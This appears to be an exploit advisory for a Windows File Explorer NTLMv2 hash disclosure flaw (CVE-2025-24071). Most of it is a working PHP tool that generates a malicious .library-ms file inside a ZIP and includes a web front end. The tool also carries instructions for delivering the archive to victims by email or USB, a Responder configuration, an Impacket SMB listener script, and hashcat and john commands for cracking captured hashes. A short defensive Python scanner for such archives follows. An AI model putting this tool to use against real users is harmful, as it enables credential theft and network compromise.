The Windows File Explorer NTLM Hash Disclosure is a vulnerability where File Explorer inadvertently sends a user's NTLM hash to an attacker-controlled server.
This occurs when a user views or previews a specially crafted file (e.g., `.LNK`, `.SCF`, `.URL`) containing a UNC path like `\\malicious-server\share`.
File Explorer, in an attempt to generate a thumbnail or retrieve file information, tries to connect to this remote path. During this connection, it performs NTLM authentication using the logged-in user's credentials.
An attacker running a tool like Responder can intercept this NTLM challenge-response. With the captured NTLM hash, the attacker can perform "Pass-the-Hash" attacks for lateral movement or attempt to crack the hash offline to obtain the user's plaintext password. It's a common initial access or lateral movement technique.
=============================================================================================================================================
| # Title : Windows File Explorer NTLM v2 Hash Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built-in component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/197740/ & CVE-2025-24071
[+] Summary :
Windows File Explorer in Windows 10 and 11 contains a critical NTLM hash disclosure vulnerability that allows attackers to capture user authentication credentials by exploiting the automatic parsing of .library-ms files from ZIP archives, leading to potential domain compromise through credential relay attacks.
The vulnerability exists in Windows Explorer's automatic handling of .library-ms files extracted from ZIP archives. When a user extracts a malicious ZIP file, Explorer automatically attempts to connect to SMB shares specified in the .library-ms file, leaking NTLMv2 hashes to attacker-controlled servers without user interaction.
[+] POC :
php poc.php
<?php
class WindowsNTLMHashDisclosure {
private $ip;
private $filename;
private $output_dir;
private $keep_files;
public function __construct($ip, $filename = 'malicious', $output_dir = 'output', $keep_files = false) {
$this->ip = $ip;
$this->filename = $filename;
$this->output_dir = rtrim($output_dir, '/');
$this->keep_files = $keep_files;
}
public function banner() {
echo "==================================================\n";
echo " Windows File Explorer NTLM Hash Disclosure\n";
echo " CVE-2025-24071 Exploit Tool\n";
echo " Author: indoushka (PHP Port)\n";
echo "==================================================\n\n";
}
public function create_library_ms() {
$payload = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{$this->ip}\\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
XML;
$library_file = $this->output_dir . '/' . $this->filename . '.library-ms';
if (!file_put_contents($library_file, $payload)) {
throw new Exception("Failed to create .library-ms file");
}
echo "[+] Created malicious .library-ms file: {$library_file}\n";
return $library_file;
}
public function build_zip($library_file) {
$zip_file = $this->output_dir . '/' . $this->filename . '.zip';
$zip = new ZipArchive();
if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
throw new Exception("Cannot create ZIP file: {$zip_file}");
}
$zip->addFile($library_file, basename($library_file));
$zip->close();
echo "[+] Created ZIP archive: {$zip_file}\n";
return $zip_file;
}
public function exploit() {
$this->banner();
echo "[*] Target SMB Server: {$this->ip}\n";
echo "[*] Output Directory: {$this->output_dir}\n";
echo "[*] Base Filename: {$this->filename}\n\n";
// Create output directory
if (!is_dir($this->output_dir)) {
if (!mkdir($this->output_dir, 0755, true)) {
throw new Exception("Failed to create output directory: {$this->output_dir}");
}
}
// Create malicious .library-ms file
$library_file = $this->create_library_ms();
// Package into ZIP
$zip_file = $this->build_zip($library_file);
// Clean up if not keeping files
if (!$this->keep_files && file_exists($library_file)) {
unlink($library_file);
echo "[-] Removed intermediate .library-ms file\n";
}
$this->display_instructions($zip_file);
return $zip_file;
}
private function display_instructions($zip_file) {
echo "\n" . str_repeat("=", 60) . "\n";
echo " EXPLOITATION INSTRUCTIONS\n";
echo str_repeat("=", 60) . "\n";
echo "1. Start SMB listener on {$this->ip}:\n";
echo " - Using Responder: responder -I eth0 -wrf\n";
echo " - Using Impacket: smbserver.py SHARE /tmp/smb -smb2support\n";
echo "\n2. Deliver ZIP file to victim:\n";
echo " - File: {$zip_file}\n";
echo " - Methods: Email, USB, Network share, etc.\n";
echo "\n3. When victim extracts ZIP, Windows Explorer will:\n";
echo " - Automatically parse .library-ms file\n";
echo " - Attempt SMB connection to {$this->ip}\n";
echo " - Leak NTLMv2 hash to your SMB server\n";
echo "\n4. Crack the captured hash:\n";
echo " - Use hashcat: hashcat -m 5600 hash.txt wordlist.txt\n";
echo " - Use john: john --format=netntlmv2 hash.txt\n";
echo str_repeat("=", 60) . "\n";
}
public static function is_valid_ip($ip) {
return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}
public function get_file_paths() {
return [
'library_ms' => $this->output_dir . '/' . $this->filename . '.library-ms',
'zip' => $this->output_dir . '/' . $this->filename . '.zip'
];
}
}
class SMBListenerHelper {
public static function generate_responder_config($ip) {
$config = <<<CONFIG
; Responder Configuration for CVE-2025-24071
; Save as responder.conf
[Responder Core]
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
; Network interface
Interface = eth0
; Specific IP to listen on
BindIP = {$ip}
; Analysis mode (optional)
Analyze = On
CONFIG;
return $config;
}
public static function generate_smbserver_script() {
$script = <<<PYTHON
#!/usr/bin/env python3
# Impacket SMB Server for CVE-2025-24071
from impacket import smbserver
import argparse


class CVE202524071Server:
    def __init__(self, listen_address, share_path):
        # SimpleSMBServer takes (listenAddress, listenPort, configFile); pass the port by name
        self.server = smbserver.SimpleSMBServer(listenAddress=listen_address, listenPort=445)
        # Windows 10/11 clients need SMB2 (same as the -smb2support flag of smbserver.py)
        self.server.setSMB2Support(True)
        self.server.addShare("SHARE", share_path)

    def start(self):
        print("[*] Starting SMB server for CVE-2025-24071")
        print("[*] Waiting for NTLM hash leakage...")
        self.server.start()


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--ip", required=True, help="IP to listen on")
    parser.add_argument("--share", default="/tmp/smb", help="Share path")
    args = parser.parse_args()
    server = CVE202524071Server(args.ip, args.share)
    server.start()
PYTHON;
return $script;
}
}
class HashCrackingHelper {
public static function display_cracking_commands($hash_file = 'captured_hashes.txt') {
$commands = [
'hashcat' => "hashcat -m 5600 {$hash_file} /usr/share/wordlists/rockyou.txt",
'john' => "john --format=netntlmv2 {$hash_file}",
'online_crack' => "Use online services like crackstation.net or hashes.com"
];
echo "\n" . str_repeat("=", 50) . "\n";
echo " HASH CRACKING COMMANDS\n";
echo str_repeat("=", 50) . "\n";
foreach ($commands as $tool => $command) {
echo "{$tool}: {$command}\n";
}
echo str_repeat("=", 50) . "\n";
}
public static function generate_hash_example() {
$example = <<<HASH
Example NTLMv2 Hash Format:
username::domain:challenge:HMAC-MD5:blob
Actual captured hash will look like:
Administrator
HASH;
return $example;
}
}
// Command line interface
if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
if ($argc < 2) {
echo "Windows File Explorer NTLM Hash Disclosure (CVE-2025-24071)\n";
echo "===========================================================\n";
echo "Usage: php " . $argv[0] . " <attacker_ip> [options]\n";
echo "Example: php " . $argv[0] . " 192.168.1.100\n";
echo "Example: php " . $argv[0] . " 192.168.1.100 -n payroll -o ./malicious_zips --keep\n";
echo "\nOptions:\n";
echo " -n, --name Base filename (default: malicious)\n";
echo " -o, --output Output directory (default: ./output)\n";
echo " -k, --keep Keep .library-ms file after ZIP creation\n";
echo " --smb-help Show SMB listener setup help\n";
echo " --crack-help Show hash cracking instructions\n";
exit(1);
}
$ip = $argv[1];
$filename = 'malicious';
$output_dir = 'output';
$keep_files = false;
// Parse command line options
for ($i = 2; $i < $argc; $i++) {
switch ($argv[$i]) {
case '-n':
case '--name':
$filename = $argv[++$i];
break;
case '-o':
case '--output':
$output_dir = $argv[++$i];
break;
case '-k':
case '--keep':
$keep_files = true;
break;
case '--smb-help':
echo SMBListenerHelper::generate_responder_config('192.168.1.100');
echo "\n\n";
echo SMBListenerHelper::generate_smbserver_script();
exit(0);
case '--crack-help':
HashCrackingHelper::display_cracking_commands();
echo "\n" . HashCrackingHelper::generate_hash_example() . "\n";
exit(0);
}
}
try {
if (!WindowsNTLMHashDisclosure::is_valid_ip($ip)) {
echo "[-] Invalid IP address: {$ip}\n";
exit(1);
}
$exploit = new WindowsNTLMHashDisclosure($ip, $filename, $output_dir, $keep_files);
$zip_file = $exploit->exploit();
echo "\n[+] Exploit files created successfully!\n";
echo "[+] Deliver this file to the victim: {$zip_file}\n";
} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
exit(1);
}
}
// Web interface for the exploit
if (isset($_GET['web']) && $_GET['web'] === 'true') {
?>
<!DOCTYPE html>
<html>
<head>
<title>CVE-2025-24071 - NTLM Hash Disclosure</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; background: #f0f0f0; }
.container { max-width: 900px; margin: 0 auto; background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
h1 { color: #d32f2f; border-bottom: 2px solid #d32f2f; padding-bottom: 10px; }
.form-group { margin: 20px 0; }
label { display: block; margin-bottom: 5px; font-weight: bold; color: #333; }
input[type="text"] { padding: 10px; width: 300px; border: 1px solid #ddd; border-radius: 4px; }
button { background: #d32f2f; color: white; padding: 12px 25px; border: none; border-radius: 4px; cursor: pointer; font-size: 16px; }
button:hover { background: #b71c1c; }
.output { background: #f8f8f8; padding: 15px; border-radius: 4px; margin: 20px 0; white-space: pre-wrap; font-family: monospace; }
.success { color: #388e3c; font-weight: bold; }
.error { color: #d32f2f; font-weight: bold; }
.info-box { background: #e3f2fd; padding: 15px; border-radius: 4px; margin: 15px 0; }
</style>
</head>
<body>
<div class="container">
<h1>CVE-2025-24071 - Windows NTLM Hash Disclosure</h1>
<?php
if ($_POST['generate'] ?? false) {
$ip = $_POST['ip'] ?? '';
$filename = $_POST['filename'] ?? 'malicious';
$keep_files = isset($_POST['keep_files']);
if (!empty($ip)) {
echo '<div class="output">';
try {
$exploit = new WindowsNTLMHashDisclosure($ip, $filename, 'web_output', $keep_files);
$zip_file = $exploit->exploit();
$file_paths = $exploit->get_file_paths();
if (file_exists($file_paths['zip'])) {
$file_url = 'web_output/' . basename($file_paths['zip']);
echo '<p class="success">ZIP file generated successfully!</p>';
echo '<p><a href="' . $file_url . '" download>Download Malicious ZIP File</a></p>';
}
} catch (Exception $e) {
echo '<p class="error">Error: ' . $e->getMessage() . '</p>';
}
echo '</div>';
}
}
?>
<form method="post">
<div class="form-group">
<label for="ip">Your SMB Server IP:</label>
<input type="text" id="ip" name="ip" placeholder="192.168.1.100" required>
</div>
<div class="form-group">
<label for="filename">ZIP Filename:</label>
<input type="text" id="filename" name="filename" value="malicious">
</div>
<div class="form-group">
<label>
<input type="checkbox" name="keep_files" value="1">
Keep .library-ms file (for analysis)
</label>
</div>
<button type="submit" name="generate">Generate Malicious ZIP</button>
</form>
<div class="info-box">
<h3>About CVE-2025-24071:</h3>
<p>This vulnerability affects Windows File Explorer in Windows 10/11. When a user extracts a ZIP file containing a malicious .library-ms file, Windows Explorer automatically attempts to connect to an SMB server specified in the file, leaking the user's NTLMv2 hash.</p>
<h3>Exploitation Steps:</h3>
<ol>
<li>Set up SMB listener on your server</li>
<li>Generate malicious ZIP using this tool</li>
<li>Deliver ZIP to target user</li>
<li>Capture NTLM hash when they extract the file</li>
<li>Crack the hash to obtain credentials</li>
</ol>
<p><strong>Note:</strong> This tool is for educational and
authorized testing purposes only.</p>
</div>
</div>
</body>
</html>
<?php
exit;
}
?>
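As an added, defender-side example (editor's code, not part of the advisory or indoushka's PoC): a Python scanner for a mail gateway or sandbox that opens a ZIP, parses each .library-ms entry in the libraryDescription layout the PoC above writes, and reports any UNC target not on an allow-list. It goes slightly beyond the PoC by matching `<url>` elements with or without the XML namespace; the sample archive, the `payroll.library-ms` entry name and the 203.0.113.10 host are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# UNC path as the PoC writes it into <url>, e.g. \\203.0.113.10\shared; group 1 is the host.
UNC_RE = re.compile(r"^\\\\([^\\/]+)\\")

def find_unc_hosts(xml_bytes):
    """Hosts named by <url> elements of a .library-ms body, with or without its namespace."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # not well-formed XML: Explorer has no location to resolve
    hosts = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:
            m = UNC_RE.match(el.text.strip())
            if m:
                hosts.append(m.group(1))
    return hosts

def scan_zip(zip_bytes, allowed_hosts=()):
    """(entry, host) for each .library-ms entry whose UNC target is not allow-listed."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                for host in find_unc_hosts(zf.read(info)):
                    if host.lower() not in allowed:
                        findings.append((info.filename, host))
    return findings

def build_sample_zip(host="203.0.113.10"):
    """Constructed test archive mirroring the PoC's layout; the host is a documentation-range IP."""
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">\n'
        '<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>\n'
        f'<url>\\\\{host}\\shared</url>\n'
        '</simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>\n'
        '</libraryDescription>\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("payroll.library-ms", body)
        zf.writestr("readme.txt", "harmless filler entry")
    return buf.getvalue()
```

A hit means the archive would make Explorer open an outbound SMB session to that host on extraction, so quarantine it and check egress logs for port 445 traffic to the reported address.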
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx) |
===================================================================================================